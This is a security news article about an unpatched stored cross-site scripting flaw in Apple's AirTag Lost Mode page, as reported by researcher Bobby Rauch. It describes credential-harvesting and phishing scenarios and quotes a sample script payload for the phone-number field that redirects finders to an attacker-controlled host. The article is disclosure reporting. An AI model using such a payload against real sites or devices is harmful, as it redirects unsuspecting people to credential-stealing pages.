Apple’s personal item-tracker devices can be used to deliver malware, slurp credentials, steal tokens & more thanks to XSS.
An unpatched stored cross-site scripting (XSS) bug in Apple’s AirTag “Lost Mode” could open up users to a many web-based attacks, including credential-harvesting, click-jacking, malware delivery, token theft & more.
Persistent XSS
That’s according to Bobby Rauch, an independent security researcher who explained that it’s possible to use the zero-day to fully weaponize an AirTag, with the ability to attack random strangers (or specific targets) should they interact with it.
Stored XSS, also known as persistent XSS, occurs when a malicious script is injected directly into a vulnerable web application. An attack then only requires that a victim visit a compromised web page.
How AirTags work: Apple’s AirTags are personal tracking devices that can be attached to keys, backpacks & other items. If an AirTagged item is lost & nearby, a user can “ping” the AirTag, which will emit a sound & allow it to be tracked down.
Bluetooth Signal
If it’s further away (left behind in a restaurant, etc.), the AirTag sends out a secure Bluetooth signal that can be detected by nearby devices in Apple’s Find My network (which has had its own issues in the past). These devices send the location of the AirTag to iCloud & the user can open the Find My app & see the lost item on a map.
The Lost Mode function goes hand in hand with the further function. If an AirTag doesn’t show up in the Find My app, a user can mark the AirTag as missing, & will get an alert if it’s later picked up by the Find My network.
Lost Mode
However, the problem part of Lost Mode has to do with a different thing: If a stranger finds an AirTag in Lost Mode & scans it via near-field communication (NFC), it generates a unique https://found.apple.com page, which contains its serial number, phone number & a personal message for anyone discovering it. The idea is to let people “turn in” missing items to their rightful owners.
The issue, according to Rauch, is that these pages don’t have protection for stored XSS – so, an attacker can inject a malicious payload into the AirTag using the Lost Mode phone number field.
In 1 attack situation, cyber-criminals can use XSS code to redirect victims to the attacker’s fake iCloud page, which has a keylogger installed to capture their credentials.
Credential-Hijacking
“A victim will believe they are being asked to sign into iCloud so they can get in contact with the owner of the AirTag, when in fact, the attacker has redirected them to a credential-hijacking page,” Rauch stated in a Tues. posting.
“”Since AirTags were recently released, most users would be unaware that accessing the https://found.apple.com page doesn’t require authentication at all.”
He added, “An attacker can create weaponised AirTags & leave them around, victimising innocent people who are simply trying to help a person find their lost AirTag.”
Malicious Payload
Rauch provided an example malicious payload to be entered into the phone number field: “<script>window.location=’https://10.0.1.137:8000/indexer.html’;var a = ”;</script>”. He also noted that AirTags could be weaponized to carry out all sorts of attacks.
“This is only one example of the dangers of stored XSS,” he wrote. “There are countless ways an attacker could victimise an end user who discovers a lost AirTag…The https://found.apple.com link can also be used as a phishing link, & shared via a desktop/laptop, without the need for a mobile device to scan the AirTag.
Injection Attacks
Further injection attacks could occur through the Find My App, which is used to scan 3rd-party devices that support ‘Lost Mode’ as part of Apple’s Find My network.”
The bug has yet to be patched, although Rauch told security journalist Brian Krebs that he reported it to Apple on June 20. Last week, the company told him that it was planning to patch “in an upcoming update.”
Without a timeline for a fix or any response to his multiple questions about credit & acknowledgement, Rauch told Krebs he decided to go public.
